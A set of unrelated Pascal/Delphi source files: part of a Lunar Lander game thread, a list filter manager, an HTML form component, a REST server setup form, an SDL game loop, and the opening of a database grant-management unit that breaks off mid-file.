TARGET_WIDTH = 1.6; // width of target // UI constants (i.e. the speed & fuel bars) const UI_BAR = 100; // width of the bar(s) const UI_BAR_HEIGHT = 10; // height of the bar(s) constructor(aSurfaceHolder: SurfaceHolder; aContext: Context; aHandler: Handler); method doStart; method pause; method restoreState(savedState: Bundle); locked; method run; override; method saveState(map: Bundle): Bundle; method setDifficulty(difficulty: Integer); method setFiring(firing: Boolean); method setState(mode: Integer); method setState(mode: Integer; aMessage: CharSequence); method setSurfaceSize(width: Integer; height: Integer); method unpause; end; implementation constructor LunarThread(aSurfaceHolder: SurfaceHolder; aContext: Context; aHandler: Handler); begin // get handles to some important objects mSurfaceHolder := aSurfaceHolder; mHandler := aHandler; mContext := aContext; var res: Resources := aContext.Resources; // cache handles to our key sprites & other drawables mLanderImage := res.Drawable[R.drawable.lander_plain]; mFiringImage := res.Drawable[R.drawable.lander_firing]; mCrashedImage := res.Drawable[R.drawable.lander_crashed]; // load background image as a Bitmap instead of a Drawable b/c // we don't need to transform it and it's faster to draw this way mBackgroundImage := BitmapFactory.decodeResource(res, R.drawable.earthrise); // Use the regular lander image as the model size for all sprites mLanderWidth := mLanderImage.IntrinsicWidth; mLanderHeight := mLanderImage.IntrinsicHeight; // Initialize paints for speedometer mLinePaint := new Paint; mLinePaint.AntiAlias := true; mLinePaint.setARGB(255, 0, 255, 0); mLinePaintBad := new Paint; mLinePaintBad.AntiAlias := true; mLinePaintBad.setARGB(255, 120, 180, 0); mScratchRect := new RectF(0, 0, 0, 0); mWinsInARow := 0; mDifficulty := DIFFICULTY_MEDIUM; // initial show-up of lander (not yet playing) mX := mLanderWidth; mY := mLanderHeight * 2; mFuel := PHYS_FUEL_INIT; mDX := 0; mDY := 0; mHeading := 0; mEngineFiring := true end; /// <summary> /// Starts the game, setting parameters for the current difficulty. /// </summary> method LunarThread.doStart; begin locking mSurfaceHolder do begin // First set the game for Medium difficulty mFuel := PHYS_FUEL_INIT; mEngineFiring := false; mGoalWidth := Integer(mLanderWidth * TARGET_WIDTH); mGoalSpeed := TARGET_SPEED; mGoalAngle := TARGET_ANGLE; var speedInit: Integer := PHYS_SPEED_INIT; // Adjust difficulty params for EASY/HARD if mDifficulty = DIFFICULTY_EASY then begin mFuel := mFuel * 3 div 2; mGoalWidth := mGoalWidth * 4 div 3; mGoalSpeed := mGoalSpeed * 3 div 2; mGoalAngle := mGoalAngle * 4 div 3; speedInit := speedInit * 3 div 4 end else if mDifficulty = DIFFICULTY_HARD then begin mFuel := mFuel * 7 div 8; mGoalWidth := mGoalWidth * 3 div 4; mGoalSpeed := mGoalSpeed * 7 div 8; speedInit := speedInit * 4 div 3 end; // pick a convenient initial location for the lander sprite mX := mCanvasWidth div 2; mY := mCanvasHeight - mLanderHeight div 2; // start with a little random motion mDY := Math.random * -speedInit; mDX := (Math.random * 2 * speedInit) - speedInit; mHeading := 0; // Figure initial spot for landing, not too near center while true do begin mGoalX := Integer(Math.random * (mCanvasWidth - mGoalWidth)); if Math.abs(mGoalX - (mX - mLanderWidth div 2)) > mCanvasHeight div 6 then break end; mLastTime := System.currentTimeMillis + 100; setState(STATE_RUNNING) end end; /// <summary> /// Pauses the physics update & animation. /// </summary> method LunarThread.pause; begin Log.w(&Class.Name, 'LunarThread.pause'); //Check for already-paused state if mPaused then exit; locking mSurfaceHolder do if mMode = STATE_RUNNING then setState(STATE_PAUSE); //NOTE: new thread management code //To pause the thread we set a flag to true locking mPauseLock do mPaused := true end; /// <summary> /// Resumes from a pause. /// </summary> method LunarThread.unpause; begin Log.w(&Class.Name, 'LunarThread.pause'); // Move the real time clock up to now locking mSurfaceHolder do mLastTime := System.currentTimeMillis + 100; setState(STATE_RUNNING); //NOTE: new thread management code //To resume the thread we unset the flag and notify all waiting on the lock locking mPauseLock do begin mPaused := false; mPauseLock.notifyAll end; end; /// <summary> /// Dump game state to the provided Bundle. Typically called when the /// Activity is being suspended. /// </summary> /// <param name="map"></param> /// <returns>Bundle with this view's state</returns> method LunarThread.saveState(map: Bundle): Bundle; begin locking mSurfaceHolder do begin if map <> nil then begin map.putInt(KEY_DIFFICULTY, mDifficulty); map.putDouble(KEY_X, mX); map.putDouble(KEY_Y, mY); map.putDouble(KEY_DX, mDX); map.putDouble(KEY_DY, mDY); map.putDouble(KEY_HEADING, mHeading); map.putInt(KEY_LANDER_WIDTH, mLanderWidth); map.putInt(KEY_LANDER_HEIGHT, mLanderHeight); map.putInt(KEY_GOAL_X, mGoalX); map.putInt(KEY_GOAL_SPEED, mGoalSpeed); map.putInt(KEY_GOAL_ANGLE, mGoalAngle); map.putInt(KEY_GOAL_WIDTH, mGoalWidth); map.putInt(KEY_WINS, mWinsInARow); map.putDouble(KEY_FUEL, mFuel); //NOTE: mMode wasn't stored in the original Java version. This meant //that is you died and rotated the device, you'd die again. The same //applied to winning map.putInt(KEY_MODE, mMode); end end; exit map end; /// <summary> /// Restores game state from the indicated Bundle. Typically called when /// the Activity is being restored after having been previously /// destroyed. /// </summary> /// <param name="savedState">Bundle containing the game state</param> method LunarThread.restoreState(savedState: Bundle); begin locking mSurfaceHolder do begin mRotating := 0; mEngineFiring := false; mDifficulty := savedState.Int[KEY_DIFFICULTY]; mX := savedState.Double[KEY_X]; mY := savedState.Double[KEY_Y]; mDX := savedState.Double[KEY_DX]; mDY := savedState.Double[KEY_DY]; mHeading := savedState.Double[KEY_HEADING]; mLanderWidth := savedState.Int[KEY_LANDER_WIDTH]; mLanderHeight := savedState.Int[KEY_LANDER_HEIGHT]; mGoalX := savedState.Int[KEY_GOAL_X]; mGoalSpeed := savedState.Int[KEY_GOAL_SPEED]; mGoalAngle := savedState.Int[KEY_GOAL_ANGLE]; mGoalWidth := savedState.Int[KEY_GOAL_WIDTH]; mWinsInARow := savedState.Int[KEY_WINS]; mFuel := savedState.Double[KEY_FUEL]; //NOTE: mMode wasn't stored in the original Java version. This meant //that is you died and rotated the device, you'd die again. The same //applied to winning mMode := savedState.Int[KEY_MODE]; case mMode of STATE_LOSE, STATE_WIN: setState(STATE_READY); STATE_RUNNING: setState(STATE_PAUSE) end; end end; method LunarThread.run; begin while true do begin var c: Canvas := nil; try c := mSurfaceHolder.lockCanvas(nil); locking mSurfaceHolder do begin if mMode = STATE_RUNNING then updatePhysics; //NOTE: original SDK demo did not check for nil here //On some devices immediately after rotation c will be nil if c <> nil then doDraw(c); end; finally // do this in a finally so that if an exception is thrown // during the above, we don't leave the Surface in an // inconsistent state if c <> nil then mSurfaceHolder.unlockCanvasAndPost(c) end; //NOTE: new thread management code //If the thread has been paused, then block until we are //notified we can proceed locking mPauseLock do while mPaused do try mPauseLock.wait except on e: InterruptedException do ; end end end; /// <summary> /// Sets the current difficulty. /// </summary> method LunarThread.setDifficulty(difficulty: Integer); begin locking mSurfaceHolder do mDifficulty := difficulty end; /// <summary> /// Sets if the engine is currently firing. /// </summary> method LunarThread.setFiring(firing: Boolean); begin locking mSurfaceHolder do mEngineFiring := firing end; /// <summary> /// Sets the game mode. That is, whether we are running, paused, in the /// failure state, in the victory state, etc. /// see setState(int, CharSequence) /// </summary> /// <param name="mode">one of the STATE_* constants</param> method LunarThread.setState(mode: Integer); begin locking mSurfaceHolder do setState(mode, nil) end; /// <summary> /// Sets the game mode. That is, whether we are running, paused, in the /// failure state, in the victory state, etc. /// </summary> /// <param name="mode">one of the STATE_* constants</param> /// <param name="message">string to add to screen or null</param> method LunarThread.setState(mode: Integer; aMessage: CharSequence); begin // This method optionally can cause a text aMessage to be displayed // to the user when the mode changes. Since the View that actually // renders that text is part of the main View hierarchy and not // owned by this thread, we can't touch the state of that View. // Instead we use a Message + Handler to relay commands to the main // thread, which updates the user-text View. locking mSurfaceHolder do begin mMode := mode; if mMode = STATE_RUNNING then begin var msg: Message := mHandler.obtainMessage; var b: Bundle := new Bundle; b.putString('text', ''); b.putInt('viz', View.INVISIBLE); msg.Data := b; mHandler.sendMessage(msg) end else begin mRotating := 0; mEngineFiring := false; var res: Resources := mContext.Resources; var str: CharSequence := case mMode of STATE_READY: res.Text[R.string.mode_ready]; STATE_PAUSE: res.Text[R.string.mode_pause]; STATE_LOSE: res.Text[R.string.mode_lose]; else {STATE_WIN} res.String[R.string.mode_win_prefix] + mWinsInARow + ' ' + res.String[R.string.mode_win_suffix] end; if aMessage <> nil then str := aMessage.toString + #10 + str; if mMode = STATE_LOSE then mWinsInARow := 0; var msg: Message := mHandler.obtainMessage; var b: Bundle := new Bundle; b.putString('text', str.toString); b.putInt('viz', View.VISIBLE); msg.Data := b; mHandler.sendMessage(msg) end end end; /// <summary> /// Callback invoked when the surface dimensions change. /// </summary> method LunarThread.setSurfaceSize(width: Integer; height: Integer); begin // synchronized to make sure these all change atomically locking mSurfaceHolder do begin mCanvasWidth := width; mCanvasHeight := height; // don't forget to resize the background image mBackgroundImage := Bitmap.createScaledBitmap(mBackgroundImage, width, height, true) end end; /// <summary> /// Handles a key-down event. /// </summary> /// <param name="keyCode">the key that was pressed</param> /// <param name="msg">the original event object</param> /// <returns>true</returns> method LunarThread.doKeyDown(keyCode: Integer; msg: KeyEvent): Boolean; begin locking mSurfaceHolder do begin var okStart: Boolean := false; if keyCode in [KeyEvent.KEYCODE_DPAD_UP, KeyEvent.KEYCODE_DPAD_DOWN, KeyEvent.KEYCODE_S] then okStart := true; if okStart and (mMode in [STATE_READY, STATE_LOSE, STATE_WIN]) then begin // ready-to-start -> start doStart; exit true end else if (mMode = STATE_PAUSE) and okStart then begin // paused -> running unpause; exit true end else if mMode = STATE_RUNNING then case keyCode of // center/space -> fire KeyEvent.KEYCODE_DPAD_CENTER, KeyEvent.KEYCODE_SPACE: begin Log.i(&Class.Name, 'firing'); setFiring(true); exit true end; // left/q -> left KeyEvent.KEYCODE_DPAD_LEFT, KeyEvent.KEYCODE_Q: begin mRotating := -1; exit true end; // right/w -> right KeyEvent.KEYCODE_DPAD_RIGHT, KeyEvent.KEYCODE_W: begin mRotating := 1; exit true end; // up -> pause KeyEvent.KEYCODE_DPAD_UP: begin pause; exit true end; end; exit false end end; /// <summary> /// Handles a key-up event. /// </summary> /// <param name="keyCode">the key that was pressed</param> /// <param name="msg">the original event object</param> /// <returns>true if the key was handled and consumed, or else false</returns> method LunarThread.doKeyUp(keyCode: Integer; msg: KeyEvent): Boolean; begin var handled: Boolean := false; locking mSurfaceHolder do begin if mMode = STATE_RUNNING then case keyCode of KeyEvent.KEYCODE_DPAD_CENTER, KeyEvent.KEYCODE_SPACE: begin Log.i(&Class.Name, 'not firing'); setFiring(false); handled := true end; KeyEvent.KEYCODE_DPAD_LEFT, KeyEvent.KEYCODE_Q, KeyEvent.KEYCODE_DPAD_RIGHT, KeyEvent.KEYCODE_W: begin mRotating := 0; handled := true end; end; end; exit handled end; /// <summary> /// Draws the ship, fuel/speed bars, and background to the provided /// Canvas. /// </summary> method LunarThread.doDraw(aCanvas: Canvas); begin // Draw the background image. Operations on the Canvas accumulate // so this is like clearing the screen. aCanvas.drawBitmap(mBackgroundImage, 0, 0, nil); var yTop: Integer := mCanvasHeight - Integer(mY + mLanderHeight div 2); var xLeft: Integer := Integer(mX - mLanderWidth div 2); // Draw the fuel gauge var fuelWidth: Integer := Integer(UI_BAR * mFuel div PHYS_FUEL_MAX); mScratchRect.&set(4, 4, 4 + fuelWidth, 4 + UI_BAR_HEIGHT); aCanvas.drawRect(mScratchRect, mLinePaint); // Draw the speed gauge, with a two-tone effect var speed: Double := Math.sqrt(mDX * mDX + mDY * mDY); var speedWidth: Integer := Integer(UI_BAR * speed div PHYS_SPEED_MAX); if speed <= mGoalSpeed then begin mScratchRect.&set(4 + UI_BAR + 4, 4, 4 + UI_BAR + 4 + speedWidth, 4 + UI_BAR_HEIGHT); aCanvas.drawRect(mScratchRect, mLinePaint) end else begin // Draw the bad color in back, with the good color in front of // it mScratchRect.&set(4 + UI_BAR + 4, 4, 4 + UI_BAR + 4 + speedWidth, 4 + UI_BAR_HEIGHT); aCanvas.drawRect(mScratchRect, mLinePaintBad); var goalWidth: Integer := UI_BAR * mGoalSpeed div PHYS_SPEED_MAX; mScratchRect.&set(4 + UI_BAR + 4, 4, 4 + UI_BAR + 4 + goalWidth, 4 + UI_BAR_HEIGHT); aCanvas.drawRect(mScratchRect, mLinePaint) end; // Draw the landing pad aCanvas.drawLine(mGoalX, 1 + mCanvasHeight - TARGET_PAD_HEIGHT, mGoalX + mGoalWidth, 1 + mCanvasHeight - TARGET_PAD_HEIGHT, mLinePaint); // Draw the ship with its current rotation aCanvas.save; aCanvas.rotate(Single(mHeading), Single(mX), mCanvasHeight - Single(mY)); if mMode = STATE_LOSE then begin mCrashedImage.setBounds(xLeft, yTop, xLeft + mLanderWidth, yTop + mLanderHeight); mCrashedImage.draw(aCanvas) end else if mEngineFiring then begin mFiringImage.setBounds(xLeft, yTop, xLeft + mLanderWidth, yTop + mLanderHeight); mFiringImage.draw(aCanvas) end else begin mLanderImage.setBounds(xLeft, yTop, xLeft + mLanderWidth, yTop + mLanderHeight); mLanderImage.draw(aCanvas) end; aCanvas.restore end; /// <summary> /// Figures the lander state (x, y, fuel, ...) based on the passage of /// realtime. Does not invalidate(). Called at the start of draw(). /// Detects the end-of-game and sets the UI to the next state. /// </summary> method LunarThread.updatePhysics; begin var now: Int64 := System.currentTimeMillis; // Do nothing if mLastTime is in the future. // This allows the game-start to delay the start of the physics // by 100ms or whatever. if mLastTime > now then exit; var elapsed: Double := (now - mLastTime) / 1000.0; // mRotating -- update heading if mRotating <> 0 then begin mHeading := mHeading + (mRotating * PHYS_SLEW_SEC * elapsed); // Bring things back into the range 0..360 if mHeading < 0 then mHeading := mHeading + 360 else if mHeading >= 360 then mHeading := mHeading - 360 end; // Base accelerations -- 0 for x, gravity for y var ddx: Double := 0; var ddy: Double := -PHYS_DOWN_ACCEL_SEC * elapsed; if mEngineFiring then begin // taking 0 as up, 90 as to the right // cos(deg) is ddy component, sin(deg) is ddx component var elapsedFiring: Double := elapsed; var fuelUsed: Double := elapsedFiring * PHYS_FUEL_SEC; // tricky case where we run out of fuel partway through the // elapsed if fuelUsed > mFuel then begin elapsedFiring := mFuel div fuelUsed * elapsed; fuelUsed := mFuel; // Oddball case where we adjust the "control" from here mEngineFiring := false end; mFuel := mFuel - fuelUsed; // have this much acceleration from the engine var accel: Double := PHYS_FIRE_ACCEL_SEC * elapsedFiring; var radians: Double := 2 * Math.PI * mHeading div 360; ddx := Math.sin(radians) * accel; ddy := ddy + Math.cos(radians) * accel end; var dxOld: Double := mDX; var dyOld: Double := mDY; // figure speeds for the end of the period mDX := mDX + ddx; mDY := mDY + ddy; // figure position based on average speed during the period mX := mX + (elapsed * (mDX + dxOld) div 2); mY := mY + (elapsed * (mDY + dyOld) div 2); mLastTime := now; // Evaluate if we have landed ... stop the game var yLowerBound: Double := TARGET_PAD_HEIGHT + (mLanderHeight div 2) - TARGET_BOTTOM_PADDING; if mY <= yLowerBound then begin mY := yLowerBound; var &result: Integer := STATE_LOSE; var msg: CharSequence := ''; var res: Resources := mContext.Resources; var speed: Double := Math.sqrt(mDX * mDX + mDY * mDY); var onGoal: Boolean := (mGoalX <= mX - mLanderWidth div 2) and (mX + mLanderWidth div 2 <= mGoalX + mGoalWidth); // "Hyperspace" win -- upside down, going fast, // puts you back at the top. if (onGoal and (Math.abs(mHeading - 180) < mGoalAngle) and (speed > PHYS_SPEED_HYPERSPACE)) then begin &result := STATE_WIN; inc(mWinsInARow); doStart; exit end else if not onGoal then msg := res.Text[R.string.message_off_pad] else if not (mHeading <= mGoalAngle) or (mHeading >= 360 - mGoalAngle) then msg := res.getText(R.string.message_bad_angle) else if speed > mGoalSpeed then msg := res.Text[R.string.message_too_fast] else begin &result := STATE_WIN; inc(mWinsInARow) end; setState(&result, msg) end end; end.
unit InflatablesList_Manager_Filter; {$INCLUDE '.\InflatablesList_defs.inc'} interface uses InflatablesList_Types, InflatablesList_Manager_Base, InflatablesList_Manager_Sort; type TILManager_Filter = class(TILManager_Sort) protected fFilterSettings: TILFilterSettings; procedure ThisCopyFrom_Filter(Source: TILManager_Base; UniqueCopy: Boolean); virtual; public constructor CreateAsCopy(Source: TILManager_Base; UniqueCopy: Boolean); override; procedure CopyFrom(Source: TILManager_Base; UniqueCopy: Boolean); override; procedure FilterItems; virtual; property FilterSettings: TILFilterSettings read fFilterSettings write fFilterSettings; end; implementation procedure TILManager_Filter.ThisCopyFrom_Filter(Source: TILManager_Base; UniqueCopy: Boolean); begin If Source is TILManager_Filter then fFilterSettings := TILManager_Filter(Source).FilterSettings; end; //============================================================================== constructor TILManager_Filter.CreateAsCopy(Source: TILManager_Base; UniqueCopy: Boolean); begin inherited CreateAsCopy(Source,UniqueCopy); ThisCopyFrom_Filter(Source,UniqueCopy); end; //------------------------------------------------------------------------------ procedure TILManager_Filter.CopyFrom(Source: TILManager_Base; UniqueCopy: Boolean); begin inherited CopyFrom(Source,UniqueCopy); ThisCopyFrom_Filter(Source,UniqueCopy); end; //------------------------------------------------------------------------------ procedure TILManager_Filter.FilterItems; var i: Integer; begin For i := ItemLowIndex to ItemHighIndex do fList[i].Filter(fFilterSettings); end; end.
unit ThForm; interface uses Windows, Classes, Controls, StdCtrls, ExtCtrls, Graphics, Messages, SysUtils, Types, ThWebControl, ThTag, ThPanel, ThWebDataDictionary; type TThFormMethod = ( fmPost, fmGet ); TThForm = class(TThCustomPanel) private FAction: string; FMethod: TThFormMethod; FInputs: TThWebDataDictionary; FDefaultButton: TControl; protected function GetInputs: TThDictionaryData; function GetInputsHtml: string; virtual; function GetOutlineColor: TColor; override; procedure SetDefaultButton(const Value: TControl); virtual; procedure SetInputs(const Value: TThDictionaryData); protected function IsButton(const Value: TControl): Boolean; procedure Notification(AComponent: TComponent; Operation: TOperation); override; procedure Tag(inTag: TThTag); override; public constructor Create(inOwner: TComponent); override; published property Action: string read FAction write FAction; property Align; property DefaultButton: TControl read FDefaultButton write SetDefaultButton; property DesignOpaque; property Inputs: TThDictionaryData read GetInputs write SetInputs; property Method: TThFormMethod read FMethod write FMethod; property ShowGrid; property ShowOutline default true; property Style; property StyleClass; property Visible; end; const htMethod: array[TThFormMethod] of string = ( 'post', 'get' ); implementation uses ThButton, ThImageButton; const cFormSpace = 32; { TThForm } constructor TThForm.Create(inOwner: TComponent); begin inherited; ControlStyle := ControlStyle + [ csAcceptsControls ]; FInputs := TThWebDataDictionary.Create(Self); ShowOutline := true; end; function TThForm.GetOutlineColor: TColor; begin Result := clGreen; end; function TThForm.GetInputsHtml: string; const SHiddenInput = '<input type="hidden" name="%s" value="%s"/>'; var i: Integer; begin Result := ''; for i := 0 to Pred(Inputs.Count) do with Inputs[i] do Result := Result + Format(SHiddenInput, [ WebName, WebValue ]); end; procedure TThForm.Tag(inTag: TThTag); begin inherited; with inTag do begin Content := GetInputsHtml + Html; // Element := 'form'; // Attributes.Clear; Add('name', Name); Add('method', htMethod[Method]); // works even if Action='' Attributes.Add(Format('action="%s"', [ Action ])); // Styles.Clear; AddStyle('margin', 0); end; StylizeTag(inTag); ListJsAttributes(inTag.Attributes); end; procedure TThForm.SetInputs(const Value: TThDictionaryData); begin FInputs.Data.Assign(Value); end; function TThForm.GetInputs: TThDictionaryData; begin Result := FInputs.Data; end; procedure TThForm.Notification(AComponent: TComponent; Operation: TOperation); begin inherited; if (Operation = opRemove) and (AComponent = DefaultButton) then FDefaultButton := nil; end; function TThForm.IsButton(const Value: TControl): Boolean; begin Result := (Value <> nil) and ((Value is TThButton) or (Value is TThImageButton)); end; procedure TThForm.SetDefaultButton(const Value: TControl); begin if IsButton(Value) then begin if FDefaultButton <> nil then FDefaultButton.RemoveFreeNotification(Self); FDefaultButton := Value; if FDefaultButton <> nil then FDefaultButton.FreeNotification(Self); end; end; end.
unit UServidorRest; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, uDWAbout, uRESTDWBase, Vcl.ExtCtrls, Vcl.Buttons, Vcl.Menus, System.ImageList, Vcl.ImgList, Vcl.Imaging.GIFImg,Configuracoes, UConfigIni; type TFServidor = class(TForm) Button1: TButton; edt_PortaDW: TEdit; edt_UserDW: TEdit; edt_PasswordDW: TEdit; Button2: TButton; Label1: TLabel; Label2: TLabel; Label3: TLabel; labConexao: TLabel; labDBConfig: TLabel; edt_PortaDB: TEdit; edt_UsuarioDB: TEdit; edt_PasswordDB: TEdit; Label4: TLabel; Label5: TLabel; Label6: TLabel; edt_Database: TEdit; Label7: TLabel; lSeguro: TLabel; OpenDialog1: TOpenDialog; edt_HostDB: TEdit; Label8: TLabel; TrayIcon1: TTrayIcon; PopupMenu1: TPopupMenu; Sair1: TMenuItem; Panel1: TPanel; Panel2: TPanel; Panel3: TPanel; Button3: TButton; idcaixa: TLabel; RESTServicePooler1: TRESTServicePooler; RESTDWServiceNotification1: TRESTDWServiceNotification; procedure Button1Click(Sender: TObject); procedure IniciarServidor; procedure PararServidor; procedure Button2Click(Sender: TObject); procedure FormCreate(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure Sair1Click(Sender: TObject); procedure TrayIcon1DblClick(Sender: TObject); procedure Minimizar; procedure Button3Click(Sender: TObject); private FConfigIni: TConfigIni; procedure GetParametros; procedure SetParametros; { Private declarations } public { Public declarations } end; var FServidor: TFServidor; implementation uses UDataModuloServidorRest, URecurso,ServerUtils; {$R *.dfm} procedure TFServidor.Button1Click(Sender: TObject); var recurso: TRecurso; begin recurso := TRecurso.Create; try IniciarServidor; recurso.Desabilitar(FServidor); finally recurso.Free; end; end; procedure TFServidor.Button2Click(Sender: TObject); var recurso: TRecurso; begin recurso := TRecurso.Create; try PararServidor; recurso.Habilitar(FServidor); finally recurso.Free; end; end; procedure TFServidor.Button3Click(Sender: TObject); var bdcaminho: string; begin OpenDialog1.Filter := 'FDB DB (*.fdb)|*.FDB'; if OpenDialog1.Execute then begin bdcaminho := OpenDialog1.FileName; edt_Database.Text := Trim(bdcaminho); end; end; procedure TFServidor.FormClose(Sender: TObject; var Action: TCloseAction); begin Minimizar; end; procedure TFServidor.FormCreate(Sender: TObject); begin RESTServicePooler1.ServerMethodClass := TDataModuleServidorRestFull; FConfigIni := TConfigIni.Create; FConfigIni.ReadIni; GetParametros; end; procedure TFServidor.SetParametros; begin FConfigIni.PortaServ := Trim(edt_PortaDW.Text); FConfigIni.UsuarioServ := Trim(edt_UserDW.Text); FConfigIni.SenhaServ := Trim(edt_PasswordDW.Text); FConfigIni.PortBD := StrToInt(edt_PortaDB.Text); FConfigIni.UsuarioBD := Trim(edt_UsuarioDB.Text); FConfigIni.PasswordBD := Trim(edt_PasswordDB.Text); FConfigIni.CaminhoBD := Trim(edt_Database.Text); FConfigIni.HostBD := Trim(edt_HostDB.Text); FConfigIni.WriteIni; end; procedure TFServidor.IniciarServidor; begin SetParametros; if Not RESTServicePooler1.Active then begin with RESTServicePooler1 do begin TRDWAuthOptionBasic(AuthenticationOptions.OptionParams).Username := Trim(edt_UserDW.Text); TRDWAuthOptionBasic(AuthenticationOptions.OptionParams).Password := Trim(edt_PasswordDW.Text); RESTServicePooler1.ServicePort := StrToInt(edt_PortaDW.Text); RESTServicePooler1.Active := True; if RESTServicePooler1.Active = True then begin lSeguro.Caption := ' SERVIDOR CONECTADO! '; end; end; end; Minimizar; end; procedure TFServidor.Minimizar; var recurso : TRecurso; begin try TrayIcon1.Visible := True; FServidor.Hide; recurso := TRecurso.Create; recurso.Desabilitar(FServidor); TrayIcon1.BalloonHint := ' SERVIDOR EM OPERAÇÃO! '; TrayIcon1.BalloonFlags := bfInfo; TrayIcon1.ShowBalloonHint; finally recurso.Free; end; end; procedure TFServidor.PararServidor; begin if RESTServicePooler1.Active then begin RESTServicePooler1.Active := false; lSeguro.Caption := ' SERVIDOR PARADO '; end; end; procedure TFServidor.Sair1Click(Sender: TObject); begin FServidor := nil; end; procedure TFServidor.GetParametros; begin edt_PortaDW.Text := FConfigIni.PortaServ; edt_UserDW.Text := FConfigIni.UsuarioServ; edt_PasswordDW.Text := FConfigIni.SenhaServ; edt_PortaDB.Text := IntToStr(FConfigIni.PortBD); edt_UsuarioDB.Text := FConfigIni.UsuarioBD; edt_PasswordDB.Text := FConfigIni.PasswordBD; edt_Database.Text := Trim(FConfigIni.CaminhoBD); edt_HostDB.Text := FConfigIni.HostBD; end; procedure TFServidor.TrayIcon1DblClick(Sender: TObject); begin TrayIcon1.Visible := false; FServidor.Show; end; end.
UNIT TAU_MAIN; {$MODE OBJFPC} {$H+} {$INCLUDE TAU_SIGNAL} INTERFACE USES SDL, TAU_WINDOW, TAU_GAME_MAIN; TYPE TTauMain = CLASS PRIVATE b_running : boolean; ctw_window : TTauWindow; ctg_game : TTauGameMain; PROCEDURE Init(); PUBLIC CONSTRUCTOR Create(); DESTRUCTOR Destroy(); OVERRIDE; PROCEDURE MainLoop(); END; IMPLEMENTATION CONSTRUCTOR TTauMain.Create(); BEGIN Init(); END; DESTRUCTOR TTauMain.Destroy(); BEGIN ctw_window.Free(); ctg_Game.Free(); SDL_Quit(); END; PROCEDURE TTauMain.Init(); BEGIN b_running := TRUE; ctw_window := NIL; ctg_game := NIL; { Init SDL } IF (SDL_Init(SDL_INIT_EVERYTHING) <> 0) THEN BEGIN b_running := FALSE; END ELSE BEGIN { Init Win } ctw_window := TTauWindow.Create(800, 600); IF ((ctw_window = NIL) OR (ctw_window.IsOk() <> TRUE)) THEN BEGIN b_running := FALSE; WriteLn('! CTW_WINDOW'); END ELSE BEGIN { Init Game } ctg_game := TTauGameMain.Create(); IF ((ctg_game = NIL) OR (ctg_game.IsOk() <> TRUE)) THEN BEGIN b_running := FALSE; WriteLn('! CTG_GAME'); END END; END; END; PROCEDURE TTauMain.MainLoop(); VAR signal: tausignal; BEGIN signal := TAU_SIG_VOID; WHILE (b_running) DO BEGIN SDL_PumpEvents(); SDL_FillRect(ctw_window.GetPWin(), NIL, SDL_MapRGB(ctw_window.GetPWin()^.format, 11, 12, 12)); signal := ctg_game.Tick(ctw_window.GetPWin()); ctw_window.Tick(); CASE signal OF TAU_SIG_QUIT: BEGIN b_running := FALSE; END; TAU_SIG_VOID: BEGIN END; END; SDL_Delay(8); END; WriteLn('i MAIN LOOP BROKEN!'); END; END.
unit ibSHDDLGrantor; interface uses SysUtils, Classes, SHDesignIntf, ibSHDesignIntf, ibSHDriverIntf, ibSHTool; type TibSHDDLGrantor = class(TibBTTool, IibSHDDLGrantor, IibSHBranch, IfbSHBranch) private FIntDatabase: TComponent; FIntDatabaseIntf: IibSHDatabase; FPrivilegesFor: string; FGrantsOn: string; FDisplay: string; FShowSystemTables: Boolean; FIncludeFields: Boolean; FUnionUsers: TStrings; FAbsentUsers: TStrings; FSelectG: TStrings; FUpdateG: TStrings; FDeleteG: TStrings; FInsertG: TStrings; FReferenceG: TStrings; FExecuteG: TStrings; FSelectGO: TStrings; FUpdateGO: TStrings; FDeleteGO: TStrings; FInsertGO: TStrings; FReferenceGO: TStrings; FExecuteGO: TStrings; function GetPrivilegesFor: string; procedure SetPrivilegesFor(Value: string); function GetGrantsOn: string; procedure SetGrantsOn(Value: string); function GetDisplay: string; procedure SetDisplay(Value: string); function GetShowSystemTables: Boolean; procedure SetShowSystemTables(Value: Boolean); function GetIncludeFields: Boolean; procedure SetIncludeFields(Value: Boolean); procedure ClearLists; procedure SortLists; function GetUnionUsers: TStrings; function GetAbsentUsers: TStrings; procedure ExtractGrants(const AClassIID: TGUID; const ACaption: string); function GetGrantSelectIndex(const ACaption: string): Integer; function GetGrantUpdateIndex(const ACaption: string): Integer; function GetGrantDeleteIndex(const ACaption: string): Integer; function GetGrantInsertIndex(const ACaption: string): Integer; function GetGrantReferenceIndex(const ACaption: string): Integer; function GetGrantExecuteIndex(const ACaption: string): Integer; function IsGranted(const ACaption: string): Boolean; function GetNormalizeName(const ACaption: string): string; function GetPrivilegesForName(const AClassIID: TGUID; const ACaption: string): string; function GrantTable(const AClassIID: TGUID; const Privilege, OnObject, ToObject: string; WGO: Boolean): Boolean; function GrantTableField(const AClassIID: TGUID; const Privilege, OnField, OnObject, ToObject: string; WGO: Boolean): Boolean; function GrantProcedure(const AClassIID: TGUID; const OnObject, ToObject: string; WGO: Boolean): Boolean; function RevokeTable(const AClassIID: TGUID; const Privilege, OnObject, FromObject: string; WGO: Boolean): Boolean; function RevokeTableField(const AClassIID: TGUID; const Privilege, OnField, OnObject, FromObject: string; WGO: Boolean): Boolean; function RevokeProcedure(const AClassIID: TGUID; const OnObject, FromObject: string; WGO: Boolean): Boolean; public constructor Create(AOwner: TComponent); override; destructor Destroy; override; published property PrivilegesFor: string read GetPrivilegesFor write SetPrivilegesFor; property GrantsOn: string read GetGrantsOn write SetGrantsOn; property Display: string read GetDisplay write SetDisplay; property ShowSystemTables: Boolean read GetShowSystemTables write SetShowSystemTables; property IncludeFields: Boolean read GetIncludeFields write SetIncludeFields; end; TibSHDDLGrantorFactory = class(TibBTToolFactory) end; TibSHGrant = class(TSHComponent, IibSHGrant) end; TibSHGrantWGO = class(TSHComponent, IibSHGrantWGO) end; procedure Register; implementation uses ibSHConsts, ibSHSQLs, ibSHValues, ibSHDDLGrantorActions, ibSHDDLGrantorEditors; procedure Register; begin SHRegisterImage(GUIDToString(IibSHDDLGrantor), 'GrantWGO.bmp'); SHRegisterImage(GUIDToString(IibSHGrant), 'Grant.bmp'); SHRegisterImage(GUIDToString(IibSHGrantWGO), 'GrantWGO.bmp'); SHRegisterImage(GUIDToString(IibSHUser), 'User.bmp'); SHRegisterImage(TibSHDDLGrantorPaletteAction.ClassName, 'GrantWGO.bmp'); 